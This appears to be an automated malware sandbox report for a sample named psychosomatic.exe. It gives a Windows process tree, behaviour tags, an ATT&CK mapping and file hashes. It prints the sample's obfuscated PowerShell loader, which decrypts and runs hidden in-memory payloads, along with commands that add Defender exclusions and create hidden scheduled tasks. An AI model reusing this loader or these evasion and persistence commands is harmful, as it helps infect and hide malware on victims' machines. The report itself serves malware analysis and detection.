C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Users\Admin\Downloads\psychosomatic.exeC:\Users\Admin\Downloads\psychosomatic.exe C:\Users\Admin 02⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
PID:3688
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca2⤵PID:3236
-
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding2⤵PID:4780
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding2⤵PID:4520
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3164
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵PID:4184
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵PID:4296
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵PID:4916
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵PID:1984
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵PID:60
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:532
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1128
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1172
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1180 -
C:\Users\Admin\AppData\Roaming\System User"C:\Users\Admin\AppData\Roaming\System User"2⤵
- Executes dropped EXE
PID:2116
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1560
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1568
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1908
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4dc 0x4ec2⤵PID:2304
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1640
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2296
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2332
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
PID:2740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3484
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3572 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Skibidi toilet.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0zB5oNxw8ChOTR95+B7+FqMqcWMDZ3zXPUOZ3OFVNvI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1oecpyE1wbmZA6wwUszdsQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EyndQ=New-Object System.IO.MemoryStream(,$param_var); $zsSyH=New-Object System.IO.MemoryStream; $pyawh=New-Object System.IO.Compression.GZipStream($EyndQ, [IO.Compression.CompressionMode]::Decompress); $pyawh.CopyTo($zsSyH); $pyawh.Dispose(); $EyndQ.Dispose(); $zsSyH.Dispose(); $zsSyH.ToArray();}function execute_function($param_var,$param2_var){ $biCMJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zPMku=$biCMJ.EntryPoint; $zPMku.Invoke($null, $param2_var);}$nJNeX = 'C:\Users\Admin\AppData\Local\Temp\Skibidi toilet.bat';$host.UI.RawUI.WindowTitle = $nJNeX;$fOqpF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nJNeX).Split([Environment]::NewLine);foreach ($gaYRM in $fOqpF) { if ($gaYRM.StartsWith('sfseDMVMVhMjxEnxjzbU')) { $gfrZZ=$gaYRM.Substring(20); break; }}$payloads_var=[string[]]$gfrZZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:2512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_257_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_257.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_257.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_257.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0zB5oNxw8ChOTR95+B7+FqMqcWMDZ3zXPUOZ3OFVNvI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1oecpyE1wbmZA6wwUszdsQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EyndQ=New-Object System.IO.MemoryStream(,$param_var); $zsSyH=New-Object System.IO.MemoryStream; $pyawh=New-Object System.IO.Compression.GZipStream($EyndQ, [IO.Compression.CompressionMode]::Decompress); $pyawh.CopyTo($zsSyH); $pyawh.Dispose(); $EyndQ.Dispose(); $zsSyH.Dispose(); $zsSyH.ToArray();}function execute_function($param_var,$param2_var){ $biCMJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zPMku=$biCMJ.EntryPoint; $zPMku.Invoke($null, $param2_var);}$nJNeX = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_257.bat';$host.UI.RawUI.WindowTitle = $nJNeX;$fOqpF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nJNeX).Split([Environment]::NewLine);foreach ($gaYRM in $fOqpF) { if ($gaYRM.StartsWith('sfseDMVMVhMjxEnxjzbU')) { $gfrZZ=$gaYRM.Substring(20); break; }}$payloads_var=[string[]]$gfrZZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:4952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1220
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"7⤵
- Scheduled Task/Job: Scheduled Task
PID:2320
-
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4620 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff21a5cc40,0x7fff21a5cc4c,0x7fff21a5cc583⤵PID:1580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1956,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1948 /prefetch:23⤵PID:3992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2076,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2132 /prefetch:33⤵PID:4548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2280,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2476 /prefetch:83⤵PID:4892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3200 /prefetch:13⤵PID:2100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3228 /prefetch:13⤵PID:1600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4616,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4612 /prefetch:13⤵PID:3756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4632 /prefetch:83⤵PID:4524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4868 /prefetch:83⤵PID:2728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4984,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4960 /prefetch:83⤵PID:2472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4852,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4948 /prefetch:83⤵PID:3960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5184,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5076 /prefetch:13⤵PID:1860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5140,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3336 /prefetch:83⤵PID:1100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1152,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3288 /prefetch:83⤵PID:4984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4600,i,17833057884346777366,171478042219664836,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4860 /prefetch:83⤵PID:4840
-
-
-
C:\Users\Admin\Downloads\psychosomatic.exe"C:\Users\Admin\Downloads\psychosomatic.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops desktop.ini file(s)
PID:4064
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:4592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4380
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2760
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:2232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:1000
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4072
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
745KB
MD508797fe5669eaad0e743113e5f7fa5c3
SHA193666f21fcab88dfb0d405fbd0511086b3443b2d
SHA256b93c7a21005b810709d9292013914de72aea5f6ec3b6290daacafb540c948535
SHA512fef2abfa095cbf1c7556d8b8d33ac2f074e568b5c62ebcb6cb36137983a470880e7ec1998fd61d3d731aa3c6a54f2124c2b038719a0971de1d26ed1ce31ba6a9
-
Filesize
814KB
MD53ba25a58b26e778a90fd9a67fc546694
SHA1b4f75aa78950d30a73f390c0df370601ad38346b
SHA256747bb67fb4dc0ccaca4465ad6588779079579b55df02337d68f2d88eaa000ca9
SHA512b46039dee1c72164f171f0e1d3cbd24eb9e132fcf9d38cae84d623e49464c3968bf696b75003ae974a10b57f5a16871b11ed1f364444226c261e3dd2106b7c97
-
Filesize
447KB
MD55408f0bb6b71c1b2943fbe5ce1b8af1f
SHA1c9e842a5a8888a2a73c365512361d7df380ae040
SHA2569801ea0a05d825823bfadf2f9bc61763dbc6916ebb2f8a88ca9bd5464b6cee5b
SHA51211ead6a3a9ef8d93b14024069194f9ebbe3597fbfe3a4edc52500060085a9e89c6638c7d1675bc3c87c41317ed0cba73d0db62e2945a4bd8c5ca570e9f99e80d
-
Filesize
378KB
MD5be3f511a61bed26eaf445e21fbf95977
SHA1cb89b631eac6a2df181806af4258632ac66fec1a
SHA256520325f68b019a451f2f0a11ede9aa07e82ea7b284253bba407194789d21cc50
SHA5122ab9dc25b0ff2985c6fc03ca07f42b18a69cf9b39bb0849a5bed6114b5482b10942a68abbad40ec88ad7a76aa77dd5116a77eb995ff2eae5c28a1a9fbcf22ecc
-
Filesize
355KB
MD573b2c63bea7eb947f6d3efb1b2a32341
SHA10b74dfb6d09f45d02fa9fdb83fff1e760f83936b
SHA256a984c9b2f3bace222d0f2fe21c1688db53cd9de21cce7366c5f0d77cc5f4abf0
SHA512d2184cac0d2229e1fde9ff1ffec71823e451fbacd922a3024130367b3d6b826551d18e8e17a67df638e2e4e974261ae1b46ac279c83808c8e852afe99efe13d5
-
Filesize
401KB
MD5c75a81e7ed5177468739c8c9a6f9752c
SHA1ee3fa4a5b0e31541daee63a3f0d6c067dd463494
SHA256f187b74b37e8e2facb34b4927d9c6f195d8315eb735dc9dba1ef64550ad99e68
SHA5124372cad0124b9540e2056a02e151d28831a1a262d62f7aa089bff6d37bfc2490ed61293783bb907c74eb5fbfdd12577744ed8f2e00ef243d3f8e90767dc83c2b
-
Filesize
630KB
MD59b93d14d4948fe9346f5ded6b490f7a9
SHA12e4d08cdf6e865e5a8d2443481c531b9fd2776b1
SHA256a6d79586d7ac71013662ba1b2b02b9125f97ad013fbdf56e86ee2fe59af2379f
SHA5126f6ac67ab7bf7cc99ef6b736e4b63cd23bce9777b69544f8f7f6c08551351b1323042fc46626f534dfc683ef78ddf5adb365bd98507f7e2addf013f1a72063fc
-
Filesize
699KB
MD515c1639590e112b48d80411ac1b99009
SHA1b8fbf41670725f314214039c897070ea42ae5fc7
SHA2562b46f5e08e7bc2708866039e5c8428fddac0afbe31ab9df1dcc006b67b4f3dc7
SHA512d1decd4164b13826e672ea29ebd086d6ebf4ef81e9cc18174cd27bd65e3fb4218eaa558a785ef03c63eaaab75e28e2b6e11295fc4655b27c78f146effd423579
-
Filesize
493KB
MD523a5ec34926f5ae0a8039495a2aaeeed
SHA187aed9b412a14ffff736dc170d93a398705a4d8b
SHA2568b59b90fffc2652bfc87967494c4ccaeed30df7c98f2c0663ab4e3eb6e7c57d7
SHA512ddaa13d819c2afbc51141d1644dd2428d4c7231613be06b1b7e425200b103b4d87c5ef5d8774f1ea373657b12c7e8314830a16bd9531fc1ce6ec1c40f52bfb53
-
Filesize
470KB
MD52299e25bbd62ceffdb0b79223fc4fee5
SHA16bfae4d264a3bfa140cab69a431a3e0a9b52b182
SHA256f765142a370e8ab7b8ac840fbe906178e842346fbc1d031f3106536041aceaf9
SHA512ee5fe65e2353c31788b6de79ea6a00b483f605f87dd9d43312b9fa88c2f5a2d0cd4d37e4b59632e5e94a11a225d1929fc1f15f5ca4f1d9dad7aba2250e2a182c
-
Filesize
768KB
MD50a84cfc6c234dacd5eb3aae9f8b0050c
SHA1fe98b3a823ef15e7c34d91ec57d31778cb92ae1c
